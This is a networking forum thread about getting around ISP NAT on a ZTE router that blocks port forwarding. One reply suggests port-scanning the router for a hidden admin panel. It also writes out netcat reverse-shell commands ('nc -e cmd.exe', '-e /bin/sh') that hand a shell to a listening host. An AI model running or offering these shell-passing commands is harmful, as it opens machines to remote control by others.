Jump to content

Router problem


Black-Assassin
 Share

Recommended Posts

If you can't port forward, what are the things you need to access behind this router of yours? There are other ways around NAT, but depends on what programs you are using and how you set them up such as tunneling and VPNs or third party redirectors.

Link to comment
Share on other sites

Pretty much every router made in the past 15 years supports port forwarding. The issue you may be having is that whoever is your ISP may be sub NATing you. Say you pay an apartment complex for internet, they could have you on a NAT as well, which would add a layer of firewall and prevent any internet external communications to read your router where you have port forwarding enabled.

Link to comment
Share on other sites

Looking at some screenshots of ONLY ZTE brands, they look more like locked down ISP devices that don't give home users much to access and configure. Depending on which one the op has, there may not actually be functionality to configure the options needed as Mr-Protocol mentioned, from the user side alone. The ISP probably has a separate admin login and interface on another port though that I would think lets them do more than the home users can, which may be where he can access the router from and make changes. If he can port scan his router from the outside and inside network, he may find an open port for an additional admin panel with more options(but also need the login creds), which I've seen on things like my own IP Camera that has more than one admin panel. A lower level viewing panel, and a higher level configuration panel for administration of the camera.

In the meantime, I'd say work around it and do something like a reverse shell type setup, just feed whatever app or service you want to the internet based node you want to give access to with something like netcat and point it at the location you want it to be able to be reached by, passing the inside network to the outside world and whatever service/program you want to access directly to a defined IP on the outside. Not safe by any means, but a solution that may work none the less.

Example:

"Home Machine" > router > internet > "destination node" that you want to connect back to the "Home Machine". In this sense, you don't port forward so the router allows someone on the outside to call in to the "Home Machine". You instead, make the "Home Machine" call the "destination node" directly and pass it whatever service you want to it.

If this is a gaming server/service you want to open port forwarding for, you may be able to just pass the executable directly to the game servers. In any manner, start a listener on your "destination node" and on your "Home Machine" pass the executable to the "destination node" much in the same way you would a file transfer, and it should grant you access. Just don't redirect the listening node to a file output, and make it listen on a service port the home machine expects its destination to listen on.

ie: reverse shell example

"destination node" : nc -lvp 1234 -k where 1234 is the port we'll listen on from our connecting "Home Machine" and -k, if the "Home Machine" drops a connection, it will leave a listener open for later if it needs to connect back again, and again, and again.

"Home Machine" : nc -e cmd.exe 127.0.0.1 1234 where -e passes out executable, in this case cmd.exe(very dangerous since we're giving someone shell on the listening end, but used as an example in this scenario for illustration purposes) and 127.0.0.1 is the IP of our listening "destination node" outside the home network. In the case, we are calling them and passing them whatever executable we want, in this case, a command prompt/shell from windows. Same could be done in linux with "-e /bin/sh".

I don't know for certain this would work with a game and gaming servers, but I imagine you could use an internal firewall rule to redirect the game once started, to the netcat port to then send data out of the internal network(in theory). This would mean the "destination node" wants certain data, ie: game established handshake, but can't listen back inside since the port isn't open on the router, but if we initiate the connection and leave a pipe open for it, it may work to keep the connection alive. That said, I don't know if the gaming servers will work in the same way handing over a shell would. We'll want to redirect with a combination of firewall rules on the "Home Machine" to forward internally all traffic the game talks on, to our port netcat is sending data on(which would probably need to be a different than normally open port the game sends and listens on since netcat will not be able to use the same socket/port already in use by another service or program). A lot of games these days don't need port fowarding to work though, since they use things like TeamViewer does, so initiate 3rd party servers for the routing. node/game/service calls 3rd party, they listen, then pass on info to end game server/service, and all traffic passes through third party to keep the connection alive. Steam clients and EA's Origin game clients do much of this in the same way, making it so home users don't have to open ports on their routers to work. Depending on what you want to access, we may be able to come up with a better solution to work around NAT though, but I'm just trying to illustrate one use case example where you can dial out of the inside network to work around NAT in an instance when you can't call home from the outside world due to NAT restrictions.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...